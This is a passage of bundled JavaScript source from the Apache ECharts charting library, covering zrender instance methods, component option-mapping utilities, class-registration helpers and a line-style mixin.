{module:zrender/Element} el\n     */\n    add: function (el) {\n        this.storage.addRoot(el);\n        this._needsRefresh = true;\n    },\n\n    /**\n     * 删除元素\n     * @param  {module:zrender/Element} el\n     */\n    remove: function (el) {\n        this.storage.delRoot(el);\n        this._needsRefresh = true;\n    },\n\n    /**\n     * Change configuration of layer\n     * @param {string} zLevel\n     * @param {Object} config\n     * @param {string} [config.clearColor=0] Clear color\n     * @param {string} [config.motionBlur=false] If enable motion blur\n     * @param {number} [config.lastFrameAlpha=0.7] Motion blur factor. Larger value cause longer trailer\n    */\n    configLayer: function (zLevel, config) {\n        if (this.painter.configLayer) {\n            this.painter.configLayer(zLevel, config);\n        }\n        this._needsRefresh = true;\n    },\n\n    /**\n     * Set background color\n     * @param {string} backgroundColor\n     */\n    setBackgroundColor: function (backgroundColor) {\n        if (this.painter.setBackgroundColor) {\n            this.painter.setBackgroundColor(backgroundColor);\n        }\n        this._needsRefresh = true;\n    },\n\n    /**\n     * Repaint the canvas immediately\n     */\n    refreshImmediately: function () {\n        // var start = new Date();\n\n        // Clear needsRefresh ahead to avoid something wrong happens in refresh\n        // Or it will cause zrender refreshes again and again.\n        this._needsRefresh = this._needsRefreshHover = false;\n        this.painter.refresh();\n        // Avoid trigger zr.refresh in Element#beforeUpdate hook\n        this._needsRefresh = this._needsRefreshHover = false;\n\n        // var end = new Date();\n        // var log = document.getElementById('log');\n        // if (log) {\n        //     log.innerHTML = log.innerHTML + '<br>' + (end - start);\n        // }\n    },\n\n    /**\n     * Mark and repaint the canvas in the next frame of browser\n     */\n    refresh: function () {\n        this._needsRefresh = true;\n    },\n\n    /**\n     * Perform all refresh\n     */\n    flush: function () {\n        var triggerRendered;\n\n        if (this._needsRefresh) {\n            triggerRendered = true;\n            this.refreshImmediately();\n        }\n        if (this._needsRefreshHover) {\n            triggerRendered = true;\n            this.refreshHoverImmediately();\n        }\n\n        triggerRendered && this.trigger('rendered');\n    },\n\n    /**\n     * Add element to hover layer\n     * @param  {module:zrender/Element} el\n     * @param {Object} style\n     */\n    addHover: function (el, style) {\n        if (this.painter.addHover) {\n            var elMirror = this.painter.addHover(el, style);\n            this.refreshHover();\n            return elMirror;\n        }\n    },\n\n    /**\n     * Add element from hover layer\n     * @param  {module:zrender/Element} el\n     */\n    removeHover: function (el) {\n        if (this.painter.removeHover) {\n            this.painter.removeHover(el);\n            this.refreshHover();\n        }\n    },\n\n    /**\n     * Clear all hover elements in hover layer\n     * @param  {module:zrender/Element} el\n     */\n    clearHover: function () {\n        if (this.painter.clearHover) {\n            this.painter.clearHover();\n            this.refreshHover();\n        }\n    },\n\n    /**\n     * Refresh hover in next frame\n     */\n    refreshHover: function () {\n        this._needsRefreshHover = true;\n    },\n\n    /**\n     * Refresh hover immediately\n     */\n    refreshHoverImmediately: function () {\n        this._needsRefreshHover = false;\n        this.painter.refreshHover && this.painter.refreshHover();\n    },\n\n    /**\n     * Resize the canvas.\n     * Should be invoked when container size is changed\n     * @param {Object} [opts]\n     * @param {number|string} [opts.width] Can be 'auto' (the same as null/undefined)\n     * @param {number|string} [opts.height] Can be 'auto' (the same as null/undefined)\n     */\n    resize: function (opts) {\n        opts = opts || {};\n        this.painter.resize(opts.width, opts.height);\n        this.handler.resize();\n    },\n\n    /**\n     * Stop and clear all animation immediately\n     */\n    clearAnimation: function () {\n        this.animation.clear();\n    },\n\n    /**\n     * Get container width\n     */\n    getWidth: function () {\n        return this.painter.getWidth();\n    },\n\n    /**\n     * Get container height\n     */\n    getHeight: function () {\n        return this.painter.getHeight();\n    },\n\n    /**\n     * Export the canvas as Base64 URL\n     * @param {string} type\n     * @param {string} [backgroundColor='#fff']\n     * @return {string} Base64 URL\n     */\n    // toDataURL: function(type, backgroundColor) {\n    //     return this.painter.getRenderedCanvas({\n    //         backgroundColor: backgroundColor\n    //     }).toDataURL(type);\n    // },\n\n    /**\n     * Converting a path to image.\n     * It has much better performance of drawing image rather than drawing a vector path.\n     * @param {module:zrender/graphic/Path} e\n     * @param {number} width\n     * @param {number} height\n     */\n    pathToImage: function (e, dpr) {\n        return this.painter.pathToImage(e, dpr);\n    },\n\n    /**\n     * Set default cursor\n     * @param {string} [cursorStyle='default'] 例如 crosshair\n     */\n    setCursorStyle: function (cursorStyle) {\n        this.handler.setCursorStyle(cursorStyle);\n    },\n\n    /**\n     * Find hovered element\n     * @param {number} x\n     * @param {number} y\n     * @return {Object} {target, topTarget}\n     */\n    findHover: function (x, y) {\n        return this.handler.findHover(x, y);\n    },\n\n    /**\n     * Bind event\n     *\n     * @param {string} eventName Event name\n     * @param {Function} eventHandler Handler function\n     * @param {Object} [context] Context object\n     */\n    on: function (eventName, eventHandler, context) {\n        this.handler.on(eventName, eventHandler, context);\n    },\n\n    /**\n     * Unbind event\n     * @param {string} eventName Event name\n     * @param {Function} [eventHandler] Handler function\n     */\n    off: function (eventName, eventHandler) {\n        this.handler.off(eventName, eventHandler);\n    },\n\n    /**\n     * Trigger event manually\n     *\n     * @param {string} eventName Event name\n     * @param {event=} event Event object\n     */\n    trigger: function (eventName, event) {\n        this.handler.trigger(eventName, event);\n    },\n\n\n    /**\n     * Clear all objects and the canvas.\n     */\n    clear: function () {\n        this.storage.delRoot();\n        this.painter.clear();\n    },\n\n    /**\n     * Dispose self.\n     */\n    dispose: function () {\n        this.animation.stop();\n\n        this.clear();\n        this.storage.dispose();\n        this.painter.dispose();\n        this.handler.dispose();\n\n        this.animation =\n        this.storage =\n        this.painter =\n        this.handler = null;\n\n        delInstance(this.id);\n    }\n};\n\n\n\nvar zrender = (Object.freeze || Object)({\n\tversion: version$1,\n\tinit: init$1,\n\tdispose: dispose$1,\n\tgetInstance: getInstance,\n\tregisterPainter: registerPainter\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$2 = each$1;\nvar isObject$2 = isObject$1;\nvar isArray$1 = isArray;\n\n/**\n * Make the name displayable. But we should\n * make sure it is not duplicated with user\n * specified name, so use '\\0';\n */\nvar DUMMY_COMPONENT_NAME_PREFIX = 'series\\0';\n\n/**\n * If value is not array, then translate it to array.\n * @param  {*} value\n * @return {Array} [value] or value\n */\nfunction normalizeToArray(value) {\n    return value instanceof Array\n        ? value\n        : value == null\n        ? []\n        : [value];\n}\n\n/**\n * Sync default option between normal and emphasis like `position` and `show`\n * In case some one will write code like\n *     label: {\n *          show: false,\n *          position: 'outside',\n *          fontSize: 18\n *     },\n *     emphasis: {\n *          label: { show: true }\n *     }\n * @param {Object} opt\n * @param {string} key\n * @param {Array.<string>} subOpts\n */\nfunction defaultEmphasis(opt, key, subOpts) {\n    // Caution: performance sensitive.\n    if (opt) {\n        opt[key] = opt[key] || {};\n        opt.emphasis = opt.emphasis || {};\n        opt.emphasis[key] = opt.emphasis[key] || {};\n\n        // Default emphasis option from normal\n        for (var i = 0, len = subOpts.length; i < len; i++) {\n            var subOptName = subOpts[i];\n            if (!opt.emphasis[key].hasOwnProperty(subOptName)\n                && opt[key].hasOwnProperty(subOptName)\n            ) {\n                opt.emphasis[key][subOptName] = opt[key][subOptName];\n            }\n        }\n    }\n}\n\nvar TEXT_STYLE_OPTIONS = [\n    'fontStyle', 'fontWeight', 'fontSize', 'fontFamily',\n    'rich', 'tag', 'color', 'textBorderColor', 'textBorderWidth',\n    'width', 'height', 'lineHeight', 'align', 'verticalAlign', 'baseline',\n    'shadowColor', 'shadowBlur', 'shadowOffsetX', 'shadowOffsetY',\n    'textShadowColor', 'textShadowBlur', 'textShadowOffsetX', 'textShadowOffsetY',\n    'backgroundColor', 'borderColor', 'borderWidth', 'borderRadius', 'padding'\n];\n\n// modelUtil.LABEL_OPTIONS = modelUtil.TEXT_STYLE_OPTIONS.concat([\n//     'position', 'offset', 'rotate', 'origin', 'show', 'distance', 'formatter',\n//     'fontStyle', 'fontWeight', 'fontSize', 'fontFamily',\n//     // FIXME: deprecated, check and remove it.\n//     'textStyle'\n// ]);\n\n/**\n * The method do not ensure performance.\n * data could be [12, 2323, {value: 223}, [1221, 23], {value: [2, 23]}]\n * This helper method retieves value from data.\n * @param {string|number|Date|Array|Object} dataItem\n * @return {number|string|Date|Array.<number|string|Date>}\n */\nfunction getDataItemValue(dataItem) {\n    return (isObject$2(dataItem) && !isArray$1(dataItem) && !(dataItem instanceof Date))\n        ? dataItem.value : dataItem;\n}\n\n/**\n * data could be [12, 2323, {value: 223}, [1221, 23], {value: [2, 23]}]\n * This helper method determine if dataItem has extra option besides value\n * @param {string|number|Date|Array|Object} dataItem\n */\nfunction isDataItemOption(dataItem) {\n    return isObject$2(dataItem)\n        && !(dataItem instanceof Array);\n        // // markLine data can be array\n        // && !(dataItem[0] && isObject(dataItem[0]) && !(dataItem[0] instanceof Array));\n}\n\n/**\n * Mapping to exists for merge.\n *\n * @public\n * @param {Array.<Object>|Array.<module:echarts/model/Component>} exists\n * @param {Object|Array.<Object>} newCptOptions\n * @return {Array.<Object>} Result, like [{exist: ..., option: ...}, {}],\n *                          index of which is the same as exists.\n */\nfunction mappingToExists(exists, newCptOptions) {\n    // Mapping by the order by original option (but not order of\n    // new option) in merge mode. Because we should ensure\n    // some specified index (like xAxisIndex) is consistent with\n    // original option, which is easy to understand, espatially in\n    // media query. And in most case, merge option is used to\n    // update partial option but not be expected to change order.\n    newCptOptions = (newCptOptions || []).slice();\n\n    var result = map(exists || [], function (obj, index) {\n        return {exist: obj};\n    });\n\n    // Mapping by id or name if specified.\n    each$2(newCptOptions, function (cptOption, index) {\n        if (!isObject$2(cptOption)) {\n            return;\n        }\n\n        // id has highest priority.\n        for (var i = 0; i < result.length; i++) {\n            if (!result[i].option // Consider name: two map to one.\n                && cptOption.id != null\n                && result[i].exist.id === cptOption.id + ''\n            ) {\n                result[i].option = cptOption;\n                newCptOptions[index] = null;\n                return;\n            }\n        }\n\n        for (var i = 0; i < result.length; i++) {\n            var exist = result[i].exist;\n            if (!result[i].option // Consider name: two map to one.\n                // Can not match when both ids exist but different.\n                && (exist.id == null || cptOption.id == null)\n                && cptOption.name != null\n                && !isIdInner(cptOption)\n                && !isIdInner(exist)\n                && exist.name === cptOption.name + ''\n            ) {\n                result[i].option = cptOption;\n                newCptOptions[index] = null;\n                return;\n            }\n        }\n    });\n\n    // Otherwise mapping by index.\n    each$2(newCptOptions, function (cptOption, index) {\n        if (!isObject$2(cptOption)) {\n            return;\n        }\n\n        var i = 0;\n        for (; i < result.length; i++) {\n            var exist = result[i].exist;\n            if (!result[i].option\n                // Existing model that already has id should be able to\n                // mapped to (because after mapping performed model may\n                // be assigned with a id, whish should not affect next\n                // mapping), except those has inner id.\n                && !isIdInner(exist)\n                // Caution:\n                // Do not overwrite id. But name can be overwritten,\n                // because axis use name as 'show label text'.\n                // 'exist' always has id and name and we dont\n                // need to check it.\n                && cptOption.id == null\n            ) {\n                result[i].option = cptOption;\n                break;\n            }\n        }\n\n        if (i >= result.length) {\n            result.push({option: cptOption});\n        }\n    });\n\n    return result;\n}\n\n/**\n * Make id and name for mapping result (result of mappingToExists)\n * into `keyInfo` field.\n *\n * @public\n * @param {Array.<Object>} Result, like [{exist: ..., option: ...}, {}],\n *                          which order is the same as exists.\n * @return {Array.<Object>} The input.\n */\nfunction makeIdAndName(mapResult) {\n    // We use this id to hash component models and view instances\n    // in echarts. id can be specified by user, or auto generated.\n\n    // The id generation rule ensures new view instance are able\n    // to mapped to old instance when setOption are called in\n    // no-merge mode. So we generate model id by name and plus\n    // type in view id.\n\n    // name can be duplicated among components, which is convenient\n    // to specify multi components (like series) by one name.\n\n    // Ensure that each id is distinct.\n    var idMap = createHashMap();\n\n    each$2(mapResult, function (item, index) {\n        var existCpt = item.exist;\n        existCpt && idMap.set(existCpt.id, item);\n    });\n\n    each$2(mapResult, function (item, index) {\n        var opt = item.option;\n\n        assert$1(\n            !opt || opt.id == null || !idMap.get(opt.id) || idMap.get(opt.id) === item,\n            'id duplicates: ' + (opt && opt.id)\n        );\n\n        opt && opt.id != null && idMap.set(opt.id, item);\n        !item.keyInfo && (item.keyInfo = {});\n    });\n\n    // Make name and id.\n    each$2(mapResult, function (item, index) {\n        var existCpt = item.exist;\n        var opt = item.option;\n        var keyInfo = item.keyInfo;\n\n        if (!isObject$2(opt)) {\n            return;\n        }\n\n        // name can be overwitten. Consider case: axis.name = '20km'.\n        // But id generated by name will not be changed, which affect\n        // only in that case: setOption with 'not merge mode' and view\n        // instance will be recreated, which can be accepted.\n        keyInfo.name = opt.name != null\n            ? opt.name + ''\n            : existCpt\n            ? existCpt.name\n            // Avoid diffferent series has the same name,\n            // because name may be used like in color pallet.\n            : DUMMY_COMPONENT_NAME_PREFIX + index;\n\n        if (existCpt) {\n            keyInfo.id = existCpt.id;\n        }\n        else if (opt.id != null) {\n            keyInfo.id = opt.id + '';\n        }\n        else {\n            // Consider this situatoin:\n            //  optionA: [{name: 'a'}, {name: 'a'}, {..}]\n            //  optionB [{..}, {name: 'a'}, {name: 'a'}]\n            // Series with the same name between optionA and optionB\n            // should be mapped.\n            var idNum = 0;\n            do {\n                keyInfo.id = '\\0' + keyInfo.name + '\\0' + idNum++;\n            }\n            while (idMap.get(keyInfo.id));\n        }\n\n        idMap.set(keyInfo.id, item);\n    });\n}\n\nfunction isNameSpecified(componentModel) {\n    var name = componentModel.name;\n    // Is specified when `indexOf` get -1 or > 0.\n    return !!(name && name.indexOf(DUMMY_COMPONENT_NAME_PREFIX));\n}\n\n/**\n * @public\n * @param {Object} cptOption\n * @return {boolean}\n */\nfunction isIdInner(cptOption) {\n    return isObject$2(cptOption)\n        && cptOption.id\n        && (cptOption.id + '').indexOf('\\0_ec_\\0') === 0;\n}\n\n/**\n * A helper for removing duplicate items between batchA and batchB,\n * and in themselves, and categorize by series.\n *\n * @param {Array.<Object>} batchA Like: [{seriesId: 2, dataIndex: [32, 4, 5]}, ...]\n * @param {Array.<Object>} batchB Like: [{seriesId: 2, dataIndex: [32, 4, 5]}, ...]\n * @return {Array.<Array.<Object>, Array.<Object>>} result: [resultBatchA, resultBatchB]\n */\nfunction compressBatches(batchA, batchB) {\n    var mapA = {};\n    var mapB = {};\n\n    makeMap(batchA || [], mapA);\n    makeMap(batchB || [], mapB, mapA);\n\n    return [mapToArray(mapA), mapToArray(mapB)];\n\n    function makeMap(sourceBatch, map$$1, otherMap) {\n        for (var i = 0, len = sourceBatch.length; i < len; i++) {\n            var seriesId = sourceBatch[i].seriesId;\n            var dataIndices = normalizeToArray(sourceBatch[i].dataIndex);\n            var otherDataIndices = otherMap && otherMap[seriesId];\n\n            for (var j = 0, lenj = dataIndices.length; j < lenj; j++) {\n                var dataIndex = dataIndices[j];\n\n                if (otherDataIndices && otherDataIndices[dataIndex]) {\n                    otherDataIndices[dataIndex] = null;\n                }\n                else {\n                    (map$$1[seriesId] || (map$$1[seriesId] = {}))[dataIndex] = 1;\n                }\n            }\n        }\n    }\n\n    function mapToArray(map$$1, isData) {\n        var result = [];\n        for (var i in map$$1) {\n            if (map$$1.hasOwnProperty(i) && map$$1[i] != null) {\n                if (isData) {\n                    result.push(+i);\n                }\n                else {\n                    var dataIndices = mapToArray(map$$1[i], true);\n                    dataIndices.length && result.push({seriesId: i, dataIndex: dataIndices});\n                }\n            }\n        }\n        return result;\n    }\n}\n\n/**\n * @param {module:echarts/data/List} data\n * @param {Object} payload Contains dataIndex (means rawIndex) / dataIndexInside / name\n *                         each of which can be Array or primary type.\n * @return {number|Array.<number>} dataIndex If not found, return undefined/null.\n */\nfunction queryDataIndex(data, payload) {\n    if (payload.dataIndexInside != null) {\n        return payload.dataIndexInside;\n    }\n    else if (payload.dataIndex != null) {\n        return isArray(payload.dataIndex)\n            ? map(payload.dataIndex, function (value) {\n                return data.indexOfRawIndex(value);\n            })\n            : data.indexOfRawIndex(payload.dataIndex);\n    }\n    else if (payload.name != null) {\n        return isArray(payload.name)\n            ? map(payload.name, function (value) {\n                return data.indexOfName(value);\n            })\n            : data.indexOfName(payload.name);\n    }\n}\n\n/**\n * Enable property storage to any host object.\n * Notice: Serialization is not supported.\n *\n * For example:\n * var inner = zrUitl.makeInner();\n *\n * function some1(hostObj) {\n *      inner(hostObj).someProperty = 1212;\n *      ...\n * }\n * function some2() {\n *      var fields = inner(this);\n *      fields.someProperty1 = 1212;\n *      fields.someProperty2 = 'xx';\n *      ...\n * }\n *\n * @return {Function}\n */\nfunction makeInner() {\n    // Consider different scope by es module import.\n    var key = '__\\0ec_inner_' + innerUniqueIndex++ + '_' + Math.random().toFixed(5);\n    return function (hostObj) {\n        return hostObj[key] || (hostObj[key] = {});\n    };\n}\nvar innerUniqueIndex = 0;\n\n/**\n * @param {module:echarts/model/Global} ecModel\n * @param {string|Object} finder\n *        If string, e.g., 'geo', means {geoIndex: 0}.\n *        If Object, could contain some of these properties below:\n *        {\n *            seriesIndex, seriesId, seriesName,\n *            geoIndex, geoId, geoName,\n *            bmapIndex, bmapId, bmapName,\n *            xAxisIndex, xAxisId, xAxisName,\n *            yAxisIndex, yAxisId, yAxisName,\n *            gridIndex, gridId, gridName,\n *            ... (can be extended)\n *        }\n *        Each properties can be number|string|Array.<number>|Array.<string>\n *        For example, a finder could be\n *        {\n *            seriesIndex: 3,\n *            geoId: ['aa', 'cc'],\n *            gridName: ['xx', 'rr']\n *        }\n *        xxxIndex can be set as 'all' (means all xxx) or 'none' (means not specify)\n *        If nothing or null/undefined specified, return nothing.\n * @param {Object} [opt]\n * @param {string} [opt.defaultMainType]\n * @param {Array.<string>} [opt.includeMainTypes]\n * @return {Object} result like:\n *        {\n *            seriesModels: [seriesModel1, seriesModel2],\n *            seriesModel: seriesModel1, // The first model\n *            geoModels: [geoModel1, geoModel2],\n *            geoModel: geoModel1, // The first model\n *            ...\n *        }\n */\nfunction parseFinder(ecModel, finder, opt) {\n    if (isString(finder)) {\n        var obj = {};\n        obj[finder + 'Index'] = 0;\n        finder = obj;\n    }\n\n    var defaultMainType = opt && opt.defaultMainType;\n    if (defaultMainType\n        && !has(finder, defaultMainType + 'Index')\n        && !has(finder, defaultMainType + 'Id')\n        && !has(finder, defaultMainType + 'Name')\n    ) {\n        finder[defaultMainType + 'Index'] = 0;\n    }\n\n    var result = {};\n\n    each$2(finder, function (value, key) {\n        var value = finder[key];\n\n        // Exclude 'dataIndex' and other illgal keys.\n        if (key === 'dataIndex' || key === 'dataIndexInside') {\n            result[key] = value;\n            return;\n        }\n\n        var parsedKey = key.match(/^(\\w+)(Index|Id|Name)$/) || [];\n        var mainType = parsedKey[1];\n        var queryType = (parsedKey[2] || '').toLowerCase();\n\n        if (!mainType\n            || !queryType\n            || value == null\n            || (queryType === 'index' && value === 'none')\n            || (opt && opt.includeMainTypes && indexOf(opt.includeMainTypes, mainType) < 0)\n        ) {\n            return;\n        }\n\n        var queryParam = {mainType: mainType};\n        if (queryType !== 'index' || value !== 'all') {\n            queryParam[queryType] = value;\n        }\n\n        var models = ecModel.queryComponents(queryParam);\n        result[mainType + 'Models'] = models;\n        result[mainType + 'Model'] = models[0];\n    });\n\n    return result;\n}\n\nfunction has(obj, prop) {\n    return obj && obj.hasOwnProperty(prop);\n}\n\nfunction setAttribute(dom, key, value) {\n    dom.setAttribute\n        ? dom.setAttribute(key, value)\n        : (dom[key] = value);\n}\n\nfunction getAttribute(dom, key) {\n    return dom.getAttribute\n        ? dom.getAttribute(key)\n        : dom[key];\n}\n\nfunction getTooltipRenderMode(renderModeOption) {\n    if (renderModeOption === 'auto') {\n        // Using html when `document` exists, use richText otherwise\n        return env$1.domSupported ? 'html' : 'richText';\n    }\n    else {\n        return renderModeOption || 'html';\n    }\n}\n\n/**\n * Group a list by key.\n *\n * @param {Array} array\n * @param {Function} getKey\n *        param {*} Array item\n *        return {string} key\n * @return {Object} Result\n *        {Array}: keys,\n *        {module:zrender/core/util/HashMap} buckets: {key -> Array}\n */\nfunction groupData(array, getKey) {\n    var buckets = createHashMap();\n    var keys = [];\n\n    each$1(array, function (item) {\n        var key = getKey(item);\n        (buckets.get(key)\n            || (keys.push(key), buckets.set(key, []))\n        ).push(item);\n    });\n\n    return {keys: keys, buckets: buckets};\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar TYPE_DELIMITER = '.';\nvar IS_CONTAINER = '___EC__COMPONENT__CONTAINER___';\n\n/**\n * Notice, parseClassType('') should returns {main: '', sub: ''}\n * @public\n */\nfunction parseClassType$1(componentType) {\n    var ret = {main: '', sub: ''};\n    if (componentType) {\n        componentType = componentType.split(TYPE_DELIMITER);\n        ret.main = componentType[0] || '';\n        ret.sub = componentType[1] || '';\n    }\n    return ret;\n}\n\n/**\n * @public\n */\nfunction checkClassType(componentType) {\n    assert$1(\n        /^[a-zA-Z0-9_]+([.][a-zA-Z0-9_]+)?$/.test(componentType),\n        'componentType \"' + componentType + '\" illegal'\n    );\n}\n\n/**\n * @public\n */\nfunction enableClassExtend(RootClass, mandatoryMethods) {\n\n    RootClass.$constructor = RootClass;\n    RootClass.extend = function (proto) {\n\n        if (__DEV__) {\n            each$1(mandatoryMethods, function (method) {\n                if (!proto[method]) {\n                    console.warn(\n                        'Method `' + method + '` should be implemented'\n                        + (proto.type ? ' in ' + proto.type : '') + '.'\n                    );\n                }\n            });\n        }\n\n        var superClass = this;\n        var ExtendedClass = function () {\n            if (!proto.$constructor) {\n                superClass.apply(this, arguments);\n            }\n            else {\n                proto.$constructor.apply(this, arguments);\n            }\n        };\n\n        extend(ExtendedClass.prototype, proto);\n\n        ExtendedClass.extend = this.extend;\n        ExtendedClass.superCall = superCall;\n        ExtendedClass.superApply = superApply;\n        inherits(ExtendedClass, this);\n        ExtendedClass.superClass = superClass;\n\n        return ExtendedClass;\n    };\n}\n\nvar classBase = 0;\n\n/**\n * Can not use instanceof, consider different scope by\n * cross domain or es module import in ec extensions.\n * Mount a method \"isInstance()\" to Clz.\n */\nfunction enableClassCheck(Clz) {\n    var classAttr = ['__\\0is_clz', classBase++, Math.random().toFixed(3)].join('_');\n    Clz.prototype[classAttr] = true;\n\n    if (__DEV__) {\n        assert$1(!Clz.isInstance, 'The method \"is\" can not be defined.');\n    }\n\n    Clz.isInstance = function (obj) {\n        return !!(obj && obj[classAttr]);\n    };\n}\n\n// superCall should have class info, which can not be fetch from 'this'.\n// Consider this case:\n// class A has method f,\n// class B inherits class A, overrides method f, f call superApply('f'),\n// class C inherits class B, do not overrides method f,\n// then when method of class C is called, dead loop occured.\nfunction superCall(context, methodName) {\n    var args = slice(arguments, 2);\n    return this.superClass.prototype[methodName].apply(context, args);\n}\n\nfunction superApply(context, methodName, args) {\n    return this.superClass.prototype[methodName].apply(context, args);\n}\n\n/**\n * @param {Object} entity\n * @param {Object} options\n * @param {boolean} [options.registerWhenExtend]\n * @public\n */\nfunction enableClassManagement(entity, options) {\n    options = options || {};\n\n    /**\n     * Component model classes\n     * key: componentType,\n     * value:\n     *     componentClass, when componentType is 'xxx'\n     *     or Object.<subKey, componentClass>, when componentType is 'xxx.yy'\n     * @type {Object}\n     */\n    var storage = {};\n\n    entity.registerClass = function (Clazz, componentType) {\n        if (componentType) {\n            checkClassType(componentType);\n            componentType = parseClassType$1(componentType);\n\n            if (!componentType.sub) {\n                if (__DEV__) {\n                    if (storage[componentType.main]) {\n                        console.warn(componentType.main + ' exists.');\n                    }\n                }\n                storage[componentType.main] = Clazz;\n            }\n            else if (componentType.sub !== IS_CONTAINER) {\n                var container = makeContainer(componentType);\n                container[componentType.sub] = Clazz;\n            }\n        }\n        return Clazz;\n    };\n\n    entity.getClass = function (componentMainType, subType, throwWhenNotFound) {\n        var Clazz = storage[componentMainType];\n\n        if (Clazz && Clazz[IS_CONTAINER]) {\n            Clazz = subType ? Clazz[subType] : null;\n        }\n\n        if (throwWhenNotFound && !Clazz) {\n            throw new Error(\n                !subType\n                    ? componentMainType + '.' + 'type should be specified.'\n                    : 'Component ' + componentMainType + '.' + (subType || '') + ' not exists. Load it first.'\n            );\n        }\n\n        return Clazz;\n    };\n\n    entity.getClassesByMainType = function (componentType) {\n        componentType = parseClassType$1(componentType);\n\n        var result = [];\n        var obj = storage[componentType.main];\n\n        if (obj && obj[IS_CONTAINER]) {\n            each$1(obj, function (o, type) {\n                type !== IS_CONTAINER && result.push(o);\n            });\n        }\n        else {\n            result.push(obj);\n        }\n\n        return result;\n    };\n\n    entity.hasClass = function (componentType) {\n        // Just consider componentType.main.\n        componentType = parseClassType$1(componentType);\n        return !!storage[componentType.main];\n    };\n\n    /**\n     * @return {Array.<string>} Like ['aa', 'bb'], but can not be ['aa.xx']\n     */\n    entity.getAllClassMainTypes = function () {\n        var types = [];\n        each$1(storage, function (obj, type) {\n            types.push(type);\n        });\n        return types;\n    };\n\n    /**\n     * If a main type is container and has sub types\n     * @param  {string}  mainType\n     * @return {boolean}\n     */\n    entity.hasSubTypes = function (componentType) {\n        componentType = parseClassType$1(componentType);\n        var obj = storage[componentType.main];\n        return obj && obj[IS_CONTAINER];\n    };\n\n    entity.parseClassType = parseClassType$1;\n\n    function makeContainer(componentType) {\n        var container = storage[componentType.main];\n        if (!container || !container[IS_CONTAINER]) {\n            container = storage[componentType.main] = {};\n            container[IS_CONTAINER] = true;\n        }\n        return container;\n    }\n\n    if (options.registerWhenExtend) {\n        var originalExtend = entity.extend;\n        if (originalExtend) {\n            entity.extend = function (proto) {\n                var ExtendedClass = originalExtend.call(this, proto);\n                return entity.registerClass(ExtendedClass, proto.type);\n            };\n        }\n    }\n\n    return entity;\n}\n\n/**\n * @param {string|Array.<string>} properties\n */\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO Parse shadow style\n// TODO Only shallow path support\nvar makeStyleMapper = function (properties) {\n    // Normalize\n    for (var i = 0; i < properties.length; i++) {\n        if (!properties[i][1]) {\n            properties[i][1] = properties[i][0];\n        }\n    }\n    return function (model, excludes, includes) {\n        var style = {};\n        for (var i = 0; i < properties.length; i++) {\n            var propName = properties[i][1];\n            if ((excludes && indexOf(excludes, propName) >= 0)\n                || (includes && indexOf(includes, propName) < 0)\n            ) {\n                continue;\n            }\n            var val = model.getShallow(propName);\n            if (val != null) {\n                style[properties[i][0]] = val;\n            }\n        }\n        return style;\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar getLineStyle = makeStyleMapper(\n    [\n        ['lineWidth', 'width'],\n        ['stroke', 'color'],\n        ['opacity'],\n        ['shadowBlur'],\n        ['shadowOffsetX'],\n        ['shadowOffsetY'],\n        ['shadowColor']\n    ]\n);\n\nvar lineStyleMixin = {\n    getLineStyle: function (excludes) {\n        var style = getLineStyle(this, excludes);\n        // Always set lineDash whether dashed, otherwise we can not\n        // erase the previous style when assigning to el.style.\n        style.lineDash = this.getLineDash(style.lineWidth);\n        return style;\n    },\n\n    getLineDash: function (lineWidth) {\n        if (lineWidth == null) {\n            lineWidth = 1;\n        }\n        var lineType = this.get('type');\n        var dotSize = Math.max(lineWidth, 2);\n        var dashSize = lineWidth * 4;\n        return (lineType === 'solid' || lineType == null)\n            // Use `false` but not `null` for the solid line here, because `null` might be\n            // ignored when assigning to `el.style`. e.g., when setting `lineStyle.type` as\n            // `'dashed'` and `emphasis.lineStyle.type` as `'solid'` in graph series, the\n            // `lineDash` gotten form the latter one is not able to erase that from the former\n            // one if using `null` here according to the emhpsis strategy in `util/graphic.js`.\n            ? false\n            : lineType === 'dashed'\n            ? [dashSize, dashSize]\n            : [dotSize, dotSize];\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE 